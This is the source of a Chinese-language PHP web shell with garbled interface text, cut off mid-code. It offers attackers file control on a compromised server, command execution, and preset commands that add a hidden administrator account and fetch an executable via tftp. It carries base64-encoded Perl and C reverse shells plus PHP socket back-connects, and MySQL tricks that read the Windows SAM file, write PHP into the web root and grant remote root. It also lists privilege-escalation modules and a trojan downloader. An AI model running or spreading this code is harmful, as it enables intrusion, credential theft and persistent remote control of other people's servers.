$v) { $_POST[$k] = stripslashes($v); } foreach ($_GET as $k => $v) { $_GET[$k] = stripslashes($v); } } if (isset($_REQUEST[envlpass])) { hmlogin(2); exit; } if ($_COOKIE['envlpass'] != md5(envlpass)) { if ($_POST['envlpass']) { if ($_POST['envlpass'] == envlpass) { setcookie('envlpass', md5($_POST['envlpass'])); css_main(); hmlogin(); die; } else { echo '
�������,��5���Ӻ�����
'; } } islogin($shellname, $myurl); exit; } /*---End Login---*/ if (isset($_GET['down'])) { do_down($_GET['down']); } if (isset($_GET['pack'])) { $dir = do_show($_GET['pack']); $zip = new eanver($dir); $out = $zip->out; do_download($out, "eanver.tar.gz"); } if (isset($_GET['unzip'])) { css_main(); start_unzip($_GET['unzip'], $_GET['unzip'], $_GET['todir']); exit; } define('root_dir', str_replace('\\', '/', dirname(myaddress)) . '/'); define('run_win', substr(PHP_OS, 0, 3) == "WIN"); define('my_shell', str_path(root_dir . $_SERVER['SCRIPT_NAME'])); $eanver = isset($_GET['eanver']) ? $_GET['eanver'] : ""; $doing = isset($_POST['doing']) ? $_POST['doing'] : ""; $path = isset($_GET['path']) ? $_GET['path'] : root_dir; $name = isset($_POST['name']) ? $_POST['name'] : ""; $img = isset($_GET['img']) ? $_GET['img'] : ""; $p = isset($_GET['p']) ? $_GET['p'] : ""; $pp = urlencode(dirname($p)); if ($img) { css_img($img); } if ($eanver == "phpinfo") { die(phpinfo()); } if ($eanver == 'logout') { setcookie('envlpass', null); die(''); } $class = array("��Ϣ����" => array("upfiles" => "�ϴ��ļ�", "phpinfo" => "������Ϣ", "info_f" => "ϵͳ��Ϣ", "phpcode" => "ִ��PHP�ű�"), "��Ȩ����" => array("sqlshell" => "ִ��SQL���", "mysql_exec" => "Mysql����", "othersql" => "�������ݿ�", "myexp" => "Mysql_udf��Ȩ", "winapi" => "Win Api��Ȩ", "mofshell" => "Mof˫����Ȩ", "cmd" => "ִ��Cmd����", "linux" => "������Ȩ", "servu" => "Serv-U��Ȩ", "readpass" => "��Ȩ�޶�root����", "downloader" => "�ļ�����", "port" => "�˿�ɨ��"), "��������" => array("guama" => "������������", "tihuan" => "�����滻����", "scanfile" => "���������ļ�", "scanphp" => "��������ľ��", "zippak" => "ZIP��ѹ"), "�ű����" => array("getcode" => "��ȡ��ҳԴ��")); $msg = array("0" => "����ɹ�", "1" => "����ʧ��", "2" => "�ϴ��ɹ�", "3" => "�ϴ�ʧ��", "4" => "�޸ijɹ�", "5" => "�޸�ʧ��", "6" => "ɾ���ɹ�", "7" => "ɾ��ʧ��"); css_main(); switch ($eanver) { case "left": css_left(); html_n("
"); html_img("title"); html_n(" ����Ӳ��
"); $i = 2; foreach ($class as $name => $array) { html_n("
"); html_img("title"); html_n(" {$name}
"); $i++; } html_n("
"); html_img("title"); html_n(" ��������
"); html_n(""); break; case "main": css_js("1"); function getFilePermissions($file) { $perms = fileperms($file); if (($perms & 0xc000) == 0xc000) { // Socket $info = 's'; } elseif (($perms & 0xa000) == 0xa000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= $perms & 0x100 ? 'r' : '-'; $info .= $perms & 0x80 ? 'w' : '-'; $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-'); // Group $info .= $perms & 0x20 ? 'r' : '-'; $info .= $perms & 0x10 ? 'w' : '-'; $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-'); // World $info .= $perms & 0x4 ? 'r' : '-'; $info .= $perms & 0x2 ? 'w' : '-'; $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-'); return $info; } $dir = @dir($path); $REAL_DIR = File_Str(realpath($path)); if (!empty($_POST['actall'])) { echo '
' . File_Act($_POST['files'], $_POST['actall'], $_POST['inver'], $REAL_DIR) . '
'; } $NUM_D = $NUM_F = 0; if (!$_SERVER['SERVER_NAME']) { $GETURL = ''; } else { $GETURL = 'http://' . $_SERVER['SERVER_NAME'] . '/'; } $ROOT_DIR = File_Mode(); html_n("
·��:"); html_n("
"); html_n("
"); html_n(" "); html_input("file", "upfilet", "", "   "); html_input("submit", "uploadt", "�ϴ�"); if (!empty($_POST['newfile'])) { if (isset($_POST['bin'])) { $bin = $_POST['bin']; } else { $bin = "wb"; } if (substr(PHP_VERSION, 0, 1) >= 5) { if ($_POST['charset'] == 'GB2312' or $_POST['charset'] == 'GBK') { } else { $_POST['txt'] = iconv("gb2312//IGNORE", $_POST['charset'], $_POST['txt']); } } echo do_write($_POST['newfile'], $bin, $_POST['txt']) ? '
' . $_POST['newfile'] . ' ' . $msg[0] : '
' . $_POST['newfile'] . ' ' . $msg[1]; @touch($_POST['newfile'], @strtotime($_POST['time'])); } html_n('
'); while ($dirs = @$dir->read()) { if ($dirs == '.' or $dirs == '..') { continue; } $dirpath = str_path("{$path}/{$dirs}"); if (is_dir($dirpath)) { $perm = getFilePermissions($dirpath) . " " . substr(base_convert(fileperms($dirpath), 10, 8), -4); $filetime = @date('Y-m-d H:i:s', @filemtime($dirpath)); $dirpath = urlencode($dirpath); html_n(''); $NUM_D++; } } @$dir->rewind(); while ($files = @$dir->read()) { if ($files == '.' or $files == '..') { continue; } $filepath = str_path("{$path}/{$files}"); if (!is_dir($filepath)) { $fsize = @filesize($filepath); $fsize = File_Size($fsize); $perm = getFilePermissions($dirpath) . " " . substr(base_convert(fileperms($filepath), 10, 8), -4); $filetime = @date('Y-m-d H:i:s', @filemtime($filepath)); $Fileurls = str_replace(File_Str($ROOT_DIR . '/'), $GETURL, $filepath); $todir = $ROOT_DIR . '/zipfile'; $filepath = urlencode($filepath); $it = substr($filepath, -3); html_n(''); $NUM_F++; } } @$dir->close(); if (!$Filetime) { $Filetime = gmdate('Y-m-d H:i:s', time() + 3600 * 8); } print <<
Ŀ¼({$NUM_D}) / �ļ�({$NUM_F})
END; break; case "editr": css_js("2"); if (!empty($_POST['uploadt'])) { echo @copy($_FILES['upfilet']['tmp_name'], str_path($p . '/' . $_FILES['upfilet']['name'])) ? html_a("?eanver=main", $_FILES['upfilet']['name'] . ' ' . $msg[2]) : msg($msg[3]); die(''); } if (!empty($_GET['redir'])) { $name = $_GET['name']; $newdir = str_path($p . '/' . $name); @mkdir($newdir, 0777) ? html_a("?eanver=main", $name . ' ' . $msg[0]) : msg($msg[1]); die(''); } if (!empty($_GET['refile'])) { $name = $_GET['name']; $jspath = urlencode($p . '/' . $name); $pp = urlencode($p); $p = str_path($p . '/' . $name); $FILE_CODE = ""; $charset = 'GB2312'; $FILE_TIME = date('Y-m-d H:i:s', time() + 3600 * 8); if (@file_exists($p)) { echo '����Ŀ¼����"ͬ��"�ļ�
'; } } else { $jspath = urlencode($p); $FILE_TIME = date('Y-m-d H:i:s', filemtime($p)); $FILE_CODE = @file_get_contents($p); if (substr(PHP_VERSION, 0, 1) >= 5) { if (empty($_GET['charset'])) { if (TestUtf8($FILE_CODE) > 1) { $charset = 'UTF-8'; $FILE_CODE = iconv("UTF-8", "gb2312//IGNORE", $FILE_CODE); } else { $charset = 'GB2312'; } } else { if ($_GET['charset'] == 'GB2312') { $charset = 'GB2312'; } else { $charset = $_GET['charset']; $FILE_CODE = iconv($_GET['charset'], "gb2312//IGNORE", $FILE_CODE); } } } $FILE_CODE = htmlspecialchars($FILE_CODE); } print <<��������:
ָ�����룺 END; html_select(array("GB2312" => "GB2312", "UTF-8" => "UTF-8", "BIG5" => "BIG5", "EUC-KR" => "EUC-KR", "EUC-JP" => "EUC-JP", "SHIFT-JIS" => "SHIFT-JIS", "WINDOWS-874" => "WINDOWS-874", "ISO-8859-1" => "ISO-8859-1"), $charset, "onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\""); print <<
�ļ��޸�ʱ�� �Զ�������ʽ�����ļ�(����ʹ��)
END; break; case "rename": html_n("
"); break; case "info_f": function Info_Cfg($varname) { switch ($result = get_cfg_var($varname)) { case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break; } } function Info_Fun($funName) { return false !== function_exists($funName) ? "Yes" : "No"; } $dis_func = get_cfg_var("disable_functions"); $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "�������ϴ�"; $adminmail = isset($_SERVER['SERVER_ADMIN']) ? "" . $_SERVER['SERVER_ADMIN'] . "" : "" . get_cfg_var("sendmail_from") . ""; if ($dis_func == "") { $dis_func = "No"; } else { $dis_func = str_replace(" ", "
", $dis_func); $dis_func = str_replace(",", "
", $dis_func); } $phpinfo = !eregi("phpinfo", $dis_func) ? "Yes" : "No"; $info = array(array("������ʱ��/����ʱ��", date("Y��m��d�� h:i:s", time()) . " / " . gmdate("Y��n��j�� H:i:s", time() + 8 * 3600)), array("����������:�˿�(ip)", "" . $_SERVER['SERVER_NAME'] . ":" . $_SERVER['SERVER_PORT'] . " ( " . gethostbyname($_SERVER['SERVER_NAME']) . " )"), array("����������ϵͳ(���ֱ�\r\n��)", PHP_OS . " (" . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . ")"), array("��������������", $_SERVER['SERVER_SOFTWARE']), array("���IP", getenv('REMOTE_ADDR')), array("PHP���з�ʽ(\r\n�汾)", strtoupper(php_sapi_name()) . "(" . PHP_VERSION . ") / ��ȫģʽ:" . Info_Cfg("safemode")), array("����������Ա", $adminmail), array("���ļ�·��", __FILE__), array("����ʹ��URL���ļ�[allow_url_fopen]", Info_Cfg("allow_url_fopen")), array("������̬�������ӿ�[enable_dl]", Info_Cfg("enable_dl")), array("��ʾ������Ϣ[display_errors]", Info_Cfg("display_errors")), array("�Զ���ȫ�ֱ���[register_globals]", Info_Cfg("register_globals")), array("�Զ��ַ���ת��[magic_quotes_gpc]", Info_Cfg("magic_quotes_gpc")), array("����ڴ�ʹ����[memory_limit]", Info_Cfg("memory_limit")), array("POST����ֽ�[post_max_size]", Info_Cfg("post_max_size")), array("��������ϴ�[upload_max_filesize]", $upsize), array("���������ʱ��[max_execution_time]", Info_Cfg("max_execution_time") . "��"), array("���ú���[disable_functions]", $dis_func), array("������Ϣ����[phpinfo()]", $phpinfo), array("Ŀǰ���п���ռ�diskfreespace", intval(diskfreespace(".") / (1024 * 1024)) . 'Mb'), array("GZѹ���ļ�֧��[zlib]", Info_Fun("gzclose")), array("ZIPѹ���ļ�֧��[ZipArchive(php_zip)]", Info_Fun("zip_open")), array("IMAP�����ʼ�ϵͳ", Info_Fun("imap_close")), array("XML����", Info_Fun("xml_set_object")), array("FTP��½", Info_Fun("ftp_login")), array("Session֧��", Info_Fun("session_start")), array("Socket֧��", Info_Fun("fsockopen")), array("MySQL���ݿ�", Info_Fun("mysql_close")), array("MSSQL���ݿ�", Info_Fun("mssql_close")), array("Postgre SQL���ݿ�", Info_Fun("pg_close")), array("SQLite���ݿ�", Info_Fun("sqlite_close")), array("Oracle���ݿ�", Info_Fun("ora_close")), array("Oracle 8���ݿ�", Info_Fun("OCILogOff")), array("SyBase���ݿ�", Info_Fun("sybase_close")), array("Hyperwave���ݿ�", Info_Fun("hw_close")), array("InforMix���ݿ�", Info_Fun("ifx_close")), array("FilePro���ݿ�", Info_Fun("filepro_fieldcount")), array("DBA/DBM����", Info_Fun("dba_close") . " / " . Info_Fun("dbmclose")), array("ODBC/dBASE����", Info_Fun("odbc_close") . " / " . Info_Fun("dbase_close")), array("PREL�����﷨[PCRE]", Info_Fun("preg_match")), array("PDF֧��", Info_Fun("pdf_close")), array("ͼ�δ���[GD Library]", Info_Fun("imageline")), array("SNMP�������Э��", Info_Fun("snmpget"))); echo '
'); html_a('?eanver=main&path=' . uppath($path), '�ϼ�Ŀ¼'); html_n('����'); html_n('�ļ������޸�ʱ���ļ���С
'); html_img("dir"); html_a('?eanver=main&path=' . $dirpath, $dirs); html_n(''); html_n("����"); html_n("ɾ�� "); html_a('?pack=' . $dirpath, '���'); html_n(''); html_a('?eanver=perm&p=' . $dirpath . '&chmod=' . $perm, $perm); html_n('' . $filetime . ''); html_n('
'); html_img(css_showimg($files)); html_a($Fileurls, $files, ' target="_blank" title="��"'); html_n(''); if ($it == '.gz' or $it == 'zip' or $it == 'tar' or $it == '.7z') { html_a('?unzip=' . $filepath, '��ѹ', 'title="��ѹ' . $files . '" onClick="rusurechk(\'' . $todir . '\',\'?unzip=' . $filepath . '&todir=\');return false;"'); } else { html_a('?eanver=editr&p=' . $filepath, '�༭', 'title="�༭' . $files . '"'); } html_n("����"); html_n("����"); html_n("ɾ�� "); html_a('?down=' . $filepath, '����', '�༭', 'title="����' . $files . '"'); html_n(''); html_a('?eanver=perm&p=' . $filepath . '&chmod=' . $perm, $perm); html_n('' . $filetime . ''); html_a('?down=' . $filepath, $fsize, 'title="����' . $files . '"'); html_n('
"); $newname = urldecode($pp) . '/' . urlencode($_GET['newname']); @rename($p, $newname) ? html_a("?eanver=main&path={$pp}", urlencode($_GET['newname']) . ' ' . $msg[4]) : msg($msg[5]); die(''); break; case "deltree": html_n("
"); do_deltree($p) ? html_a("?eanver=main&path={$pp}", $p . ' ' . $msg[6]) : msg($msg[7]); die(''); break; case "del": html_n("
"); @unlink($p) ? html_a("?eanver=main&path={$pp}", $p . ' ' . $msg[6]) : msg($msg[7]); die(''); break; case "copy": html_n("
"); $newpath = explode('/', $_GET['newcopy']); $pathr[0] = $newpath[0]; for ($i = 1; $i < count($newpath); $i++) { $pathr[] = urlencode($newpath[$i]); } $newcopy = implode('/', $pathr); @copy($p, $newcopy) ? html_a("?eanver=main&path={$pp}", $newcopy . ' ' . $msg[4]) : msg($msg[5]); die(''); break; case "perm": html_n("
" . $p . ' ����Ϊ: '); if (is_dir($p)) { html_select(array("0777" => "0777", "0755" => "0755", "0555" => "0555"), $_GET['chmod']); } else { html_select(array("0666" => "0666", "0644" => "0644", "0444" => "0444"), $_GET['chmod']); } html_input("submit", "save", "�޸�"); back(); if ($_POST['class']) { switch ($_POST['class']) { case "0777": $change = @chmod($p, 0777); break; case "0755": $change = @chmod($p, 0755); break; case "0555": $change = @chmod($p, 0555); break; case "0666": $change = @chmod($p, 0666); break; case "0644": $change = @chmod($p, 0644); break; case "0444": $change = @chmod($p, 0444); break; } $change ? html_a("?eanver=main&path={$pp}", $msg[4]) : msg($msg[5]); die(''); } html_n("
'; for ($i = 0; $i < count($info); $i++) { echo '' . "\n"; } $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host"); try { $registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber"); $Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort"); $PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort"); } catch (Exception $e) { } echo '' . "\n"; echo '' . "\n"; echo '' . "\n"; echo '
' . $info[$i][0] . '' . $info[$i][1] . '
Terminal Service�˿�Ϊ' . $registry_proxystring . '
Telnet�˿�Ϊ' . $Telnet . '
PcAnywhere�˿�Ϊ' . $PcAnywhere . '
'; break; case "cmd": $res = '���Դ���'; $cmd = 'dir'; if (!empty($_POST['cmd'])) { $res = Exec_Run(base64_decode($_POST['cmd'])); $cmd = htmlspecialchars(base64_decode($_POST['cmd'])); } print << function sFull(i){ \tStr = new Array(11); \tStr[0] = "dir"; \tStr[1] = "net user KillWaf 1P@ssWord /add"; \tStr[2] = "net localgroup administrators KillWaf /add"; \tStr[3] = "netstat -ano"; \tStr[4] = "ipconfig"; \tStr[5] = "copy c:\\1.php d:\\2.php"; \tStr[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe"; \tStr[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123"; \tStr[8] = "tasklist -svc"; \tdocument.getElementById('cmd').value = Str[i]; \treturn true; } END; html_base(); print <<
ִ�����������ܶ����غ��������ִ�в��ˣ����˷�������������û���κι�����ִ��������ʹ��BASE64�����ύ����ֹ������Сϸ�ڣ���ɾͣ�
������� \t
END; break; case "linux": $yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR'); $yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666'; $system = strtoupper(substr(PHP_OS, 0, 3)); print <<ʹ�÷�����
\t\t\t�����Լ���������"nc -vv -l 12666"
\t\t\tȻ���ڴ���д����Ե�IP,�����ӣ��˷�����ȫ��ʵ�ã�����NC������
��ĵ�ַ
���Ӷ˿�
ִ�з�ʽ
END; if (!empty($_POST['yourip']) && !empty($_POST['yourport'])) { echo '
'; if ($_POST['use'] == 'perl') { $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; echo File_Write('/tmp/envl_bc', base64_decode($back_connect_pl), 'wb') ? '����/tmp/envl_bc�ɹ�
' : '����/tmp/envl_bcʧ��
'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; @unlink('/tmp/envl_bc.c'); echo Exec_Run($perlpath . ' /tmp/envl_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -vv -l ' . $_POST['yourport'] : 'ִ������ʧ��'; } if ($_POST['use'] == 'c') { $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; echo File_Write('/tmp/envl_bc.c', base64_decode($back_connect_c), 'wb') ? '����/tmp/envl_bc.c�ɹ�
' : '����/tmp/envl_bc.cʧ��
'; $res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c'); @unlink('/tmp/envl_bc.c'); echo Exec_Run('/tmp/envl_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -vv -l ' . $_POST['yourport'] : 'ִ������ʧ��'; } if ($_POST['use'] == 'php') { if (!extension_loaded('sockets')) { if ($system == 'WIN') { @dl('php_sockets.dll') or die("Can't load socket"); } else { @dl('sockets.so') or die("Can't load socket"); } } if ($system == "WIN") { $env = array('path' => 'c:\\windows\\system32'); } else { $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $host = $_POST['yourip']; $port = $_POST['yourport']; $host = gethostbyname($host); $proto = getprotobyname("tcp"); if (($sock = socket_create(AF_INET, SOCK_STREAM, $proto)) < 0) { die("Socket����ʧ��"); } if (($ret = socket_connect($sock, $host, $port)) < 0) { die("����ʧ��"); } else { $message = "----------------------PHP��������--------------------\n"; socket_write($sock, $message, strlen($message)); $cwd = str_replace('\\', '/', dirname(__FILE__)); while ($cmd = socket_read($sock, 65535, $proto)) { if (trim(strtolower($cmd)) == "exit") { socket_write($sock, "Bye\n"); exit; } else { $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env); if (is_resource($process)) { fwrite($pipes[0], $cmd); fclose($pipes[0]); $msg = stream_get_contents($pipes[1]); socket_write($sock, $msg, strlen($msg)); fclose($pipes[1]); $msg = stream_get_contents($pipes[2]); socket_write($sock, $msg, strlen($msg)); $return_value = proc_close($process); } } } } } if ($_POST['use'] == 'nc') { echo '
'; $mip = $_POST['yourip']; $bport = $_POST['yourport']; $fp = fsockopen($mip, $bport, $errno, $errstr); if (!$fp) { $result = "Error: could not open socket connection"; } else { fputs($fp, "\n*********************************************\n \r\n\t\t hacking url:http://www.phpinfo.cc is ok! \r\n\t\t\t \n*********************************************\n\n"); while (!feof($fp)) { fputs($fp, " [r00t@H4c3ing:/root]# "); $result = fgets($fp, 4096); $message = `{$result}`; fputs($fp, "--> " . $message . "\n"); } fclose($fp); } echo '
'; } echo '
����Գ������Ӷ˿� (nc -vv -l ' . $_POST['yourport'] . ') '; } break; case "sqlshell": $MSG_BOX = ''; $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();'; if (isset($_POST['mhost']) && isset($_POST['muser'])) { $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; if ($conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass)) { @mysql_select_db($mdata); } else { $MSG_BOX = '����MYSQLʧ��'; } } $downfile = 'c:/windows/repair/sam'; if (!empty($_POST['downfile'])) { $downfile = File_Str($_POST['downfile']); $binpath = bin2hex($downfile); $query = 'select load_file(0x' . $binpath . ')'; if ($result = @mysql_query($query, $conn)) { $k = 0; $downcode = ''; while ($row = @mysql_fetch_array($result)) { $downcode .= $row[$k]; $k++; } $filedown = basename($downfile); if (!$filedown) { $filedown = 'envl.tmp'; } $array = explode('.', $filedown); $arrayend = array_pop($array); header('Content-type: application/x-' . $arrayend); header('Content-Disposition: attachment; filename=' . $filedown); header('Content-Length: ' . strlen($downcode)); echo $downcode; exit; } else { $MSG_BOX = '�����ļ�ʧ��'; } } $o = isset($_GET['o']) ? $_GET['o'] : ''; print <<
[MYSQLִ�����] [MYSQL�ϴ��ļ�] [MYSQL�����ļ�] [MYSQL�ѿ㱸��]
��ַ �˿� �û� ���� ����
END; if ($o == 'u') { $uppath = 'C:/Documents and Settings/All Users/����ʼ���˵�/����/����/exp.vbs'; if (!empty($_POST['uppath'])) { $uppath = $_POST['uppath']; $query = 'Create TABLE a (cmd text NOT NULL);'; if (@mysql_query($query, $conn)) { if ($tmpcode = File_Read($_FILES['upfile']['tmp_name'])) { $filecode = bin2hex(File_Read($tmpcode)); } else { $tmp = File_Str(dirname(myaddress)) . '/upfile.tmp'; if (File_Up($_FILES['upfile']['tmp_name'], $tmp)) { $filecode = bin2hex(File_Read($tmp)); @unlink($tmp); } } $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x' . $filecode . ',CHAR));'; if (@mysql_query($query, $conn)) { $query = 'SELECT cmd FROM a INTO DUMPFILE \'' . $uppath . '\';'; $MSG_BOX = @mysql_query($query, $conn) ? '�ϴ��ļ��ɹ�' : '�ϴ��ļ�ʧ��'; } else { $MSG_BOX = '������ʱ��ʧ��'; } @mysql_query('Drop TABLE IF EXISTS a;', $conn); } else { $MSG_BOX = '������ʱ��ʧ��'; } } print <<
�ϴ�·��

ѡ���ļ�
END; } elseif ($o == 'tk') { if ($_POST['dump'] == 'dump') { $mysql_link = @mysql_connect($mhost, $muser, $mpass); mysql_select_db($mdata); mysql_query("SET NAMES gbk"); $mysql = ""; $q1 = mysql_query("show tables"); while ($t = mysql_fetch_array($q1)) { $table = $t[0]; $q2 = mysql_query("show create table `{$table}`"); $sql = mysql_fetch_array($q2); $mysql .= $sql['Create Table'] . ";\r\n\r\n"; $q3 = mysql_query("select * from `{$table}`"); while ($data = mysql_fetch_assoc($q3)) { $keys = array_keys($data); $keys = array_map('addslashes', $keys); $keys = join('`,`', $keys); $keys = "`" . $keys . "`"; $vals = array_values($data); $vals = array_map('addslashes', $vals); $vals = join("','", $vals); $vals = "'" . $vals . "'"; $mysql .= "insert into `{$table}`({$keys}) values({$vals});\r\n"; } $mysql .= "\r\n"; } $filename = date("Y-m-d-GisA") . ".sql"; $fp = fopen($filename, 'w'); fputs($fp, $mysql); fclose($fp); $tip = "
���ݱ��ݳɹ�������������ݿ��ļ���[" . $filename . "]
"; } else { $tip = "��δ���ݣ���֤����������Ŀ¼��д"; } print <<

�����ñ����ܣ����ݿ������ɷ�����崻������ :-(

{$tip}

END; } elseif ($o == 'd') { print <<

�����ļ�
END; } else { if (!empty($_POST['msql'])) { $msql = $_POST['msql']; if ($result = @mysql_query($msql, $conn)) { $MSG_BOX = 'ִ��SQL���ɹ�
'; $k = 0; while ($row = @mysql_fetch_array($result)) { $MSG_BOX .= $row[$k]; $k++; } } else { $MSG_BOX .= mysql_error(); } } print << function nFull(i){ \tStr = new Array(11); \tStr[0] = "select version();"; \tStr[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'"; \tStr[2] = "select '' into outfile 'F:/web/bak.php';"; \tStr[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;"; \tStr[4] = "select @@plugin_dir"; \tStr[5] = "select 'xxx' into dumpfile 'C:\\\\\\\\MySQL\\\\\\\\lib::\$INDEX_ALLOCATION';"; \tStr[6] = "select 'xxx' into dumpfile 'C:\\\\\\\\MySQL\\\\\\\\lib\\\\\\\\plugin::\$INDEX_ALLOCATION';"; \tnform.msql.value = Str[i]; \treturn true; }
END; } if ($MSG_BOX != '') { echo '
' . $MSG_BOX . '
'; } else { echo '
'; } break; case "downloader": $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe'; $Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress) . '/muma.exe'); print <<
������
���ص�
END; if (!empty($_POST['durl']) && !empty($_POST['dpath'])) { echo '
'; $contents = @file_get_contents($_POST['durl']); if (!$contents) { echo '�޷���ȡҪ���ص�����'; } else { echo File_Write($_POST['dpath'], $contents, 'wb') ? '�����ļ��ɹ�' : '�����ļ�ʧ��'; } echo '
'; } break; case "issql": session_start(); if ($_POST['sqluser'] && $_POST['sqlpass']) { $_SESSION['sql_user'] = $_POST['sqluser']; $_SESSION['sql_password'] = $_POST['sqlpass']; } if ($_POST['sqlhost']) { $_SESSION['sql_host'] = $_POST['sqlhost']; } else { $_SESSION['sql_host'] = 'localhost'; } if ($_POST['sqlport']) { $_SESSION['sql_port'] = $_POST['sqlport']; } else { $_SESSION['sql_port'] = '3306'; } if ($_SESSION['sql_user'] && $_SESSION['sql_password']) { if (!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))) { unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); die(html_a('?eanver=sqlshell', '����ʧ���뷵��')); } } else { die(html_a('?eanver=sqlshell', '����ʧ���뷵��')); } $query = mysql_query("SHOW DATABASES", $sqlcon); html_n('���ݿ��б�:'); while ($db = 